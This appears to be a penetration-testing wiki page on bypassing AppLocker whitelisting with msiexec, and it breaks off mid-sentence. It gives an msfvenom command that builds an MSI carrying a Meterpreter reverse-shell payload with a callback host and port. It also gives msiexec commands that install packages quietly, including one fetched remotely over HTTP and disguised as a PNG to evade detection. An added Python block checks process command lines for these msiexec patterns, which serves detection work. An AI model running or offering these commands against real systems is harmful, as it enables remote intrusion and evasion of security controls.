Application Whitelisting Bypass

netbiosX edited this page Jun 16, 2017 · 3 revisions

Application Whitelisting Bypasses

TODO

MSIEXEC

MSIEXEC is a Microsoft utility used to install applications packaged as MSI files. If AppLocker does not block MSI files, an attacker can use it to bypass AppLocker executable rules.

Metasploit MSFVenom can be used to generate MSI files that contain a Meterpreter payload:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.100.3 LPORT=4444 -f msi > pentestlab.msi

Execution of the MSI file on the target system will return a Meterpreter session:

The msiexec utility can execute MSI files either locally or remotely. Additionally, MSI files that have been renamed to PNG to avoid detection can also be executed normally, with the same results.

msiexec /quiet /i cmd.msi

msiexec /q /i http://192.168.100.3/tmp/cmd.png
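A defender-side check for the two invocations above, as an added example that is not part of the original wiki page: it reviews process-creation command lines for quiet msiexec installs, packages fetched over HTTP(S), and packages whose extension is not .msi. The event layout (Sysmon-style `Image`/`CommandLine` fields), the reason labels, and the function names are assumptions made for illustration.

```python
import re

# msiexec options are case-insensitive and accept "/" or "-" as the prefix.
MSIEXEC_RE = re.compile(r'(?i)\bmsiexec(?:\.exe)?\b')
QUIET_RE = re.compile(r'(?i)(?:^|\s)[/-]q(?:uiet|[nbrf][+\-!]*)?(?=\s|$)')
PKG_RE = re.compile(r'(?i)(?:^|\s)[/-](?:i|package)\s+("[^"]+"|\S+)')
URL_RE = re.compile(r'(?i)^https?://')

def assess(cmdline):
    """Return the sorted reasons (hypothetical labels) an msiexec command line needs review."""
    if not MSIEXEC_RE.search(cmdline):
        return []
    reasons = set()
    if QUIET_RE.search(cmdline):
        reasons.add("quiet-install")
    pkg = PKG_RE.search(cmdline)
    if pkg:
        path = pkg.group(1).strip('"')
        if URL_RE.match(path):
            reasons.add("remote-package")
        # Ignore any query string, then compare the extension.
        if not path.split("?", 1)[0].lower().endswith(".msi"):
            reasons.add("non-msi-extension")
    return sorted(reasons)

def triage(events):
    """Keep only events with at least one reason, as (CommandLine, reasons) pairs."""
    hits = []
    for ev in events:
        reasons = assess(ev.get("CommandLine", ""))
        if reasons:
            hits.append((ev["CommandLine"], reasons))
    return hits

# Constructed sample events; the first two reuse the command lines shown on this page.
MSI_IMAGE = r"C:\Windows\System32\msiexec.exe"
SAMPLE_EVENTS = [
    {"Image": MSI_IMAGE, "CommandLine": "msiexec /quiet /i cmd.msi"},
    {"Image": MSI_IMAGE, "CommandLine": "msiexec /q /i http://192.168.100.3/tmp/cmd.png"},
    {"Image": MSI_IMAGE,
     "CommandLine": r'"C:\Windows\System32\msiexec.exe" /i "C:\Program Files\Vendor\setup.msi"'},
    {"Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c dir"},
]

if __name__ == "__main__":
    for cmd, reasons in triage(SAMPLE_EVENTS):
        print(", ".join(reasons), "<-", cmd)
```

Quiet installs on their own are routine in software deployment, so the remote-package and non-msi-extension reasons carry most of the signal.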

If the command prompt is locked, MSIEXEC can be executed from Windows Run: